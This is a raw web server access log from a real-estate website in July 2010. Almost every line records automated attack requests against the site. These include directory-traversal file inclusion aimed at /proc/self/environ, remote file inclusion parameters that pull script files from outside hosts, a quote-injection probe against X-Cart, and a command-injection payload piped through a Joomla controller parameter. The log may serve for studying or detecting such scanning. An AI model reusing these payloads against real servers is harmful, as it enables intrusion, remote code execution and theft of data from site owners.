87.98.217.83 - - [28/Jul/2010:23:04:05 -0700] "GET /logs/access.log//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
87.98.217.83 - - [28/Jul/2010:23:04:05 -0700] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
87.98.217.83 - - [28/Jul/2010:23:04:17 -0700] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
87.98.217.83 - - [28/Jul/2010:23:04:12 -0700] "GET /logs/access.log//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
87.98.217.83 - - [28/Jul/2010:23:04:23 -0700] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
87.98.217.83 - - [28/Jul/2010:23:04:12 -0700] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
168.143.19.89 - - [28/Jul/2010:23:06:50 -0700] "GET /logs/access_100624.log//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.prosouthrealty.com"
83.165.195.143 - - [28/Jul/2010:23:08:07 -0700] "GET /logs/access.log HTTP/1.0" 200 1697 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12" "www.prosouthrealty.com"
88.250.57.232 - - [28/Jul/2010:23:30:41 -0700] "GET /logs/access_100729.log HTTP/1.0" 200 400849 "-" "Wget/1.11.4" "www.prosouthrealty.com"
112.140.183.193 - - [28/Jul/2010:23:37:24 -0700] "GET /logs/scripts.log/auth.php?xcart_dir=' HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
112.140.183.193 - - [28/Jul/2010:23:37:25 -0700] "GET /auth.php?xcart_dir=' HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
112.140.183.193 - - [28/Jul/2010:23:37:25 -0700] "GET /logs/auth.php?xcart_dir=' HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
174.123.133.162 - - [28/Jul/2010:23:40:04 -0700] "GET ////skin/zero_vote/error.php?dir=http://www.tehuurinutrecht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
174.123.133.162 - - [28/Jul/2010:23:40:16 -0700] "GET /logs/////skin/zero_vote/error.php?dir=http://www.tehuurinutrecht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
174.123.133.162 - - [28/Jul/2010:23:40:16 -0700] "GET /logs/access_100511.log/////skin/zero_vote/error.php?dir=http://www.tehuurinutrecht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
112.140.183.193 - - [28/Jul/2010:23:40:49 -0700] "GET /logs/access_100623.log/auth.php?xcart_dir=' HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
174.123.133.162 - - [28/Jul/2010:23:42:55 -0700] "GET /logs/scripts.log/////skin/zero_vote/error.php?dir=http://www.tehuurinutrecht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
93.114.41.30 - - [28/Jul/2010:23:42:56 -0700] "GET /logs/access.log/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.prosouthrealty.com"
93.114.41.30 - - [28/Jul/2010:23:42:56 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 916 "-" "libwww-perl/5.834" "www.prosouthrealty.com"
93.114.41.30 - - [28/Jul/2010:23:43:07 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1653 "-" "libwww-perl/5.834" "www.prosouthrealty.com"
93.114.41.30 - - [28/Jul/2010:23:43:40 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 916 "-" "libwww-perl/5.834" "www.prosouthrealty.com"
189.21.153.139 - - [28/Jul/2010:23:48:36 -0700] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.prosouthrealty.com"
69.10.57.162 - - [28/Jul/2010:23:54:21 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.babelfamily.org/en/modules/mod_whosonline/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
69.10.57.162 - - [28/Jul/2010:23:54:10 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.babelfamily.org/en/modules/mod_whosonline/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
69.10.57.162 - - [28/Jul/2010:23:54:14 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.babelfamily.org/en/modules/mod_whosonline/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
94.23.46.76 - - [28/Jul/2010:23:56:33 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1653 "-" "libwww-perl/5.803" "www.prosouthrealty.com"
94.23.46.76 - - [28/Jul/2010:23:56:22 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 916 "-" "libwww-perl/5.803" "www.prosouthrealty.com"
93.114.41.30 - - [28/Jul/2010:23:57:01 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1653 "-" "libwww-perl/5.834" "www.prosouthrealty.com"
93.114.41.30 - - [28/Jul/2010:23:57:02 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 916 "-" "libwww-perl/5.834" "www.prosouthrealty.com"
92.43.201.28 - - [28/Jul/2010:23:57:12 -0700] "POST /e107 HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
92.43.201.28 - - [28/Jul/2010:23:57:23 -0700] "POST /logs/e107 HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
92.43.201.28 - - [28/Jul/2010:23:57:12 -0700] "POST /logs/access.log%20%20/e107 HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
67.159.44.97 - - [29/Jul/2010:00:00:13 -0700] "GET /skin/zero_vote/error.php?dir=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
67.159.44.97 - - [29/Jul/2010:00:00:02 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
67.159.44.97 - - [29/Jul/2010:00:00:02 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
209.116.59.107 - - [29/Jul/2010:00:03:05 -0700] "GET /includes/class_item.php?fileExtension=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
209.116.59.107 - - [29/Jul/2010:00:03:17 -0700] "GET /logs/access_100623.log%20%20//includes/class_item.php?fileExtension=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
209.116.59.107 - - [29/Jul/2010:00:03:08 -0700] "GET /logs//includes/class_item.php?fileExtension=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
69.10.143.68 - - [29/Jul/2010:00:04:13 -0700] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 916 "-" "libwww-perl/5.823" "www.prosouthrealty.com"
69.10.143.68 - - [29/Jul/2010:00:04:13 -0700] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 916 "-" "libwww-perl/5.823" "www.prosouthrealty.com"
82.134.16.166 - - [29/Jul/2010:00:05:31 -0700] "GET /logs/access.log HTTP/1.1" 200 8216 "http://www.google.no/search?q=plaNETWORK+Bot+Search&hl=no&rlz=1G1GGLQ_NONO320&ei=3ydRTJ2nDd2cOOb4hJII&start=10&sa=N" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)" "www.prosouthrealty.com"
67.159.44.97 - - [29/Jul/2010:00:06:15 -0700] "GET /skin/zero_vote/error.php?dir=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
67.159.44.97 - - [29/Jul/2010:00:06:04 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
67.159.44.97 - - [29/Jul/2010:00:06:04 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
92.43.201.28 - - [29/Jul/2010:00:06:22 -0700] "POST /e107 HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
92.43.201.28 - - [29/Jul/2010:00:06:11 -0700] "POST /logs/access.log/e107 HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
92.43.201.28 - - [29/Jul/2010:00:06:11 -0700] "POST /logs/e107 HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
93.232.210.134 - - [29/Jul/2010:00:08:29 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
93.232.210.134 - - [29/Jul/2010:00:08:29 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
93.232.210.134 - - [29/Jul/2010:00:08:29 -0700] "GET /skin/zero_vote/error.php?dir=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
93.125.99.2 - - [29/Jul/2010:00:08:56 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
93.125.99.2 - - [29/Jul/2010:00:08:56 -0700] "GET /skin/zero_vote/error.php?dir=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
93.125.99.2 - - [29/Jul/2010:00:09:07 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
189.21.153.139 - - [29/Jul/2010:00:11:40 -0700] "GET /logs/access.log///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.prosouthrealty.com"
189.21.153.139 - - [29/Jul/2010:00:11:30 -0700] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.prosouthrealty.com"
189.21.153.139 - - [29/Jul/2010:00:11:42 -0700] "GET /logs///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.prosouthrealty.com"
112.140.183.193 - - [29/Jul/2010:00:13:31 -0700] "GET /logs/config.php?xcart_dir=' HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
112.140.183.193 - - [29/Jul/2010:00:13:32 -0700] "GET /config.php?xcart_dir=' HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
189.21.153.139 - - [29/Jul/2010:00:16:25 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.prosouthrealty.com"
93.232.210.134 - - [29/Jul/2010:00:16:54 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
93.232.210.134 - - [29/Jul/2010:00:16:54 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
93.232.210.134 - - [29/Jul/2010:00:17:05 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
93.232.210.134 - - [29/Jul/2010:00:20:13 -0700] "GET /logs/access_100626.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
86.109.96.188 - - [29/Jul/2010:00:21:48 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
86.109.96.188 - - [29/Jul/2010:00:24:17 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
86.109.96.188 - - [29/Jul/2010:00:28:30 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
86.109.96.188 - - [29/Jul/2010:00:28:19 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
86.109.96.188 - - [29/Jul/2010:00:28:20 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
86.109.96.188 - - [29/Jul/2010:00:33:44 -0700] "GET /logs/access_100624.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
189.21.153.139 - - [29/Jul/2010:00:35:52 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.prosouthrealty.com"
189.21.153.139 - - [29/Jul/2010:00:36:04 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.prosouthrealty.com"
189.21.153.139 - - [29/Jul/2010:00:35:53 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.prosouthrealty.com"
188.127.248.175 - - [29/Jul/2010:00:39:53 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.prosouthrealty.com"
188.127.248.175 - - [29/Jul/2010:00:40:04 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.prosouthrealty.com"
86.109.96.188 - - [29/Jul/2010:00:43:21 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
86.109.96.188 - - [29/Jul/2010:00:43:32 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
86.109.96.188 - - [29/Jul/2010:00:43:32 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
92.43.201.28 - - [29/Jul/2010:00:51:43 -0700] "POST /logs/e107 HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
92.43.201.28 - - [29/Jul/2010:00:51:43 -0700] "POST /e107 HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
92.43.201.28 - - [29/Jul/2010:00:51:43 -0700] "POST /logs/access.log/e107 HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
92.43.201.28 - - [29/Jul/2010:00:51:52 -0700] "POST /logs/access.log%20%20/e107 HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
92.43.201.28 - - [29/Jul/2010:00:51:52 -0700] "POST /logs/e107 HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
92.43.201.28 - - [29/Jul/2010:00:51:52 -0700] "POST /e107 HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
188.127.248.175 - - [29/Jul/2010:00:55:46 -0700] "GET /logs/access_100624.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.prosouthrealty.com"
188.127.248.175 - - [29/Jul/2010:00:55:46 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.prosouthrealty.com"
188.127.248.175 - - [29/Jul/2010:00:55:58 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.prosouthrealty.com"
188.127.248.175 - - [29/Jul/2010:00:56:09 -0700] "GET /logs/access_100626.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.prosouthrealty.com"
188.127.248.175 - - [29/Jul/2010:00:57:08 -0700] "GET /logs/access_100624.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.prosouthrealty.com"
188.127.248.175 - - [29/Jul/2010:00:56:58 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.prosouthrealty.com"
188.127.248.175 - - [29/Jul/2010:00:56:58 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.prosouthrealty.com"
188.127.248.175 - - [29/Jul/2010:00:57:21 -0700] "GET /logs/access_100626.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.prosouthrealty.com"
83.149.110.213 - - [29/Jul/2010:01:00:12 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
83.149.110.213 - - [29/Jul/2010:01:00:23 -0700] "GET /index.php?option=com_gcalendar&controller=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
83.149.110.213 - - [29/Jul/2010:01:00:23 -0700] "GET /index.php?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
83.149.110.213 - - [29/Jul/2010:01:00:23 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
83.149.110.213 - - [29/Jul/2010:01:00:14 -0700] "GET /logs//index.php?option=com_gcalendar&controller=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
83.149.110.213 - - [29/Jul/2010:01:00:26 -0700] "GET /logs//index.php?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:01:02:55 -0700] "GET ///index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:01:06:19 -0700] "GET ///index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:01:06:15 -0700] "GET ///index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
201.20.44.211 - - [29/Jul/2010:01:07:07 -0700] "GET ///index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:01:08:09 -0700] "GET ///index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
83.149.110.213 - - [29/Jul/2010:01:09:20 -0700] "GET /index.php?option=com_gcalendar&controller=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
83.149.110.213 - - [29/Jul/2010:01:09:31 -0700] "GET /logs//index.php?option=com_gcalendar&controller=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
83.149.110.213 - - [29/Jul/2010:01:09:32 -0700] "GET /index.php?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
83.149.110.213 - - [29/Jul/2010:01:09:33 -0700] "GET /logs//index.php?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
83.149.110.213 - - [29/Jul/2010:01:09:22 -0700] "GET /logs/access.log%20%20//index.php?option=com_gcalendar&controller=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
83.149.110.213 - - [29/Jul/2010:01:09:22 -0700] "GET /logs/access.log%20%20//index.php?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:01:09:51 -0700] "GET ///index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
174.121.240.147 - - [29/Jul/2010:01:09:50 -0700] "GET ///index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.prosouthrealty.com"
201.20.44.211 - - [29/Jul/2010:01:09:56 -0700] "GET /logs/access.log////index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.prosouthrealty.com"
201.20.44.211 - - [29/Jul/2010:01:09:56 -0700] "GET ///index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.prosouthrealty.com"
201.20.44.211 - - [29/Jul/2010:01:09:56 -0700] "GET /logs////index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.prosouthrealty.com"
211.236.43.200 - - [29/Jul/2010:01:11:08 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
211.236.43.200 - - [29/Jul/2010:01:11:20 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
211.236.43.200 - - [29/Jul/2010:01:11:09 -0700] "GET /logs/access_100511.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:01:17:41 -0700] "GET /logs/access.log////index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:01:17:41 -0700] "GET ///index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:01:17:30 -0700] "GET /logs////index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
83.143.81.22 - - [29/Jul/2010:01:21:53 -0700] "GET /logs/index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
83.143.81.22 - - [29/Jul/2010:01:21:54 -0700] "GET /index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
72.249.108.140 - - [29/Jul/2010:01:24:50 -0700] "GET /logs/index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:01:25:44 -0700] "GET /logs/access.log////index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:01:25:33 -0700] "GET ///index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:01:25:44 -0700] "GET /logs////index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
83.143.81.22 - - [29/Jul/2010:01:26:27 -0700] "GET /index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
